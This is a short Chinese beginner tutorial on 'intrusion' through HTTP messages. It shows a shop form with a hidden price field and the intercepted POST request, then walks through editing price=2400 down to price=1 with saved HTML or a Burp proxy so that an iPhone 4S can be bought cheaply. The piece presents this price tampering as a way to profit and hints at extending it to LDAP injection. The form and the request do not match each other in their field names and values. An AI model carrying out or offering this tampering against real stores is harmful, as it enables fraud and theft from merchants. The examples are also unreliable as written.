入侵渗透：HTTP消息头的应用

admin

关于HTTP消息头的应用

http消息头在网站的传输机制中，是普遍使用的，但是在国内大部分初学者并没有注意到这一块，此片文章只献给初学者，在入侵过程之中http消息头的作用。

以以购物页面为例来分析http消息头的作用的一小部分。

先来分析购物页面的一处表单。

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Buy">

</form>

再打开过程中 截取他的http消息头看看

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

虽然在打开购物页面的时候字段price并没有在页面内显示但是他还是可以由用户进行编辑和操作。

要实现编辑有两种方法

一丶 保存HTML源代码 进行修改，修改之后重新加载到浏览器之内运行

二丶使用代理拦截来修改HTTP消息头(工具burp 中的 proxy组建)

以上面http消息头为例
更改之前
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

更改之后
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=1


在最后一行中 字段price的值为2400 如果我们进行更改 改为 1，我们就可以以更便宜的价格来买到iphone 4s了。

这篇文章只提供一个思路，举一反三会有意想不到的收获例如LDAP注入等技术。